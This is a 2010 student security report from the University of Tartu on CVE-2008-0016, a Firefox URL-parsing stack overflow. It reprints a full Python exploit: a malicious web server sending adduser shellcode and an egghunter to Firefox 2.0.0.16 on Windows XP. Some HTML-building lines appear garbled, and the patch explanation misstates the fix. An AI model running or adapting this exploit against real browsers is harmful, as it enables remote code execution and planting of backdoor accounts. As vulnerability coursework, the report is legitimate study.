CVE-2008-0016 Referaat aines Andmeturve - Matemaatika ...

TARTU ÜLIKOOL
MATEMAATIKA-INFORMAATIKATEADUSKOND
Arvutiteaduse instituut
CVE-2008-0016
Referaat aines Andmeturve
Tartu 2010
Koostaja: Mihhail Klimenko
Juhendaja: Meelis Roos

TABLE OF CONTENTS
Introduction ...................................................................................................................................................................................... 3
Description ........................................................................................................................................................................................ 3
Example.......................................................................................................................................................................................... 4
Solution ............................................................................................................................................................................................... 6
Summary ............................................................................................................................................................................................ 6
Used materials: ................................................................................................................................................................................ 7

INTRODUCTION
Justin Schuh and Tom Cross of the IBM X-Force and Peter Williams of IBM Watson Labs reported
errors in Mozilla URL parsing routines. These errors could be exploited using a specially crafted UTF-8
URL in a hyperlink which could overflow a stack buffer and allow an attacker to execute arbitrary code.
It was marked as CVE-2008-0016.
DESCRIPTION
Stack-based buffer overflow in the URL parsing implementation in Mozilla Firefox before 2.0.0.17 and
SeaMonkey before 1.1.12 allows remote attackers to execute arbitrary code via a crafted UTF-8 URL in
a link. It was titled as “UTF-8 URL stack buffer overflow”. Announced and reported on 23rd September,
2008.
The table below provides information about accessibility options by using exploitable error:
Access Vector: Network exploitable
Access Complexity: Low
Authentication: Not required to exploit
Confidentiality impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and
availability violation; Allows unauthorized disclosure of information; Allows disruption of service

EXAMPLE
This example was made by Dominic Chell on 2009-09-14 for milw0rm.com. This code exploits the
UTF-8 URL overflow vulnerability described in CVE-2008-0016. As of September 2009 there are
no public exploits for this vulnerability. However, according to security focus an exploit is available
in both Canvas and Core Impact.
#!/usr/bin/python
# FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
# Adduser shellcode encoded with shikata_ga_nai
# USER=r00t PASS=r00tr00t!!
egg = (
"\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32"
"\x5f\x83\xef\xfc\x31\x47\x14\x03\x47\xa7\x1c\x7e\xa8\x2f\xa4"
"\x81\x51\xaf\xae\xc7\x6d\x24\xcc\xc2\xf5\x3b\xc2\x46\x4a\x23"
"\x97\x06\x75\x52\x4c\xf1\xfe\x60\x19\x03\xef\xb9\xdd\x9d\x43"
"\x3d\x1d\xe9\x9c\xfc\x54\x1f\xa2\x3c\x83\xd4\x9f\x94\x70\x11"
"\x95\xf1\xf2\x46\x71\xf8\xef\x1f\xf2\xf6\xa4\x54\x5b\x1a\x3a"
"\x80\xef\x3e\xb7\x57\x1b\xb7\x9b\x73\xdf\x04\x7c\x4d\x29\xea"
"\xd5\xc9\x5e\xac\xe9\x9a\x21\x3c\x81\xed\xbd\x91\x1e\x65\xb6"
"\x60\xd8\xf5\x06\x18\x49\x92\x76\x56\x6d\x3d\x1f\xfe\x90\x4b"
"\xd1\xa9\x93\xab\x8d\x38\x08\x1a\x37\xba\xb5\x42\x98\x59\x16"
"\xed\x83\xe9\x76\x84\x38\x74\x05\x46\xcd\x46\xd9\xf2\x11\xd4"
"\x29\xcb\x25\x6a\x7a\x1b\xb2\xab\x5b\x7b\x15\xea\xdf\x3f\x49"
"\xca\xf9\x9f\xe7\x77\x72\xc0\x9b\x18\x19\x61\x08\x81\xaf\x0e"
"\xa5\x3d\x70\x90\x21\xd0\x19\x7c\xc3\x59\xae\xf2\x72\xe9\x21"
"\x81\x07\x31\xcc\x55\xd8\x45\x10\xb9\x59\xe1\x14\xc5\x53")
# Egghunter where egg is 0x41424142.
# The egghunter is encoded as HTML entities, this evades the unicode conversion.
# Egghunter courtesy of skape. Modified to xor edx,edx as first instruction.
shellcode = (
"툳邐邐䊐橒堂⻍"
"Լ瑚룯䅂䅂懲疯"
"꿪쳌쳌쳌쳌"
"쳌쳌쳌쳌")
# The UTF-8 character in the URL triggers the code path where the overflow occurs.
s = "\xC3\xBA"
u = unicode(s, "utf-8")
utf8chars = u.encode( "utf-8" )
class myRequestHandler(BaseHTTPRequestHandler):
def create_exploit_buffer(self):
html = "\n\n\n"
# Store the egg and adduser shellcode in CDATA
# The egghunter will try and find this in memory
html += "\n"
html += "

html += shellcode # add egghunter
html +="邐" * 10
html += "\" >s"
html += "\n"
html += "\n"
return html
def do_GET(self):
self.printCustomHTTPResponse(200)
if self.path == "/":
target=self.client_address[0]
html = self.create_exploit_buffer()
self.wfile.write(html)
print "[*] Evil payload sent\n[*] Wait a few minutes and try connecting
with r00t/r00tr00t!!\n"
def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
self.send_header("Content-type", "text/html")
self.send_header("Server", "myRequestHandler")
self.end_headers()
print "FireFox 2.0.0.16 x86 Exploit\nAuthor: dmc@deadbeef.co.uk\n"
print "[*] Starting evil web server"
print "[*] Waiting for clients\n"
httpd = HTTPServer(('', 80), myRequestHandler)
try:
httpd.handle_request()
httpd.serve_forever()
except KeyboardInterrupt:
print "\n\n[*] Interupt caught, exiting.\n\n"
sys.exit(1)

SOLUTION
These three lines in the highlighted background were added to fix the problem in further versions of
Firefox.
Index: netwerk/dns/src/nsIDNService.cpp
===================================================================
RCS file: /cvsroot/mozilla/netwerk/dns/src/nsIDNService.cpp,v
retrieving revision 1.28
diff -u -p -9 -r1.28 nsIDNService.cpp
--- netwerk/dns/src/nsIDNService.cpp 22 Jul 2005 15:07:33 -0000 1.28
+++ netwerk/dns/src/nsIDNService.cpp 18 Aug 2008 21:27:29 -0000
@@ -145,18 +145,21 @@ nsIDNService::nsIDNService()
nsIDNService::~nsIDNService()
{
idn_nameprep_destroy(mNamePrepHandle);
}
/* ACString ConvertUTF8toACE (in AUTF8String input); */
NS_IMETHODIMP nsIDNService::ConvertUTF8toACE(const nsACString & input,
nsACString & ace)
{
// protect against bogus input
NS_ENSURE_TRUE(IsUTF8(input), NS_ERROR_UNEXPECTED);
nsresult rv;
NS_ConvertUTF8toUCS2 ustr(input);
// map ideographic period to ASCII period etc.
normalizeFullStops(ustr);
PRUint32 len, offset;
len = 0;
This protection checks if the URL link contains any UTF8 code. When it is true then shows an error.
SUMMARY
Today we see that more and more vulnerabilities and exposures are found and fixed. For today the
CVE-2008-0016 is fixed by updating the software, but as you know always will be new
vulnerabilities (actually they already exist, but we need to find them) and again we need to fix it!

USED MATERIALS:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0016
http://www.mozilla.org/security/announce/2008/mfsa2008-37.html
http://www.milw0rm.com/exploits/9663
https://bugzilla.mozilla.org/show_bug.cgi?id=451617
https://bugzilla.mozilla.org/show_bug.cgi?id=443288
http://www.securityspace.com/smysecure/catid.html?id=CVE-2008-0016&ctype=cve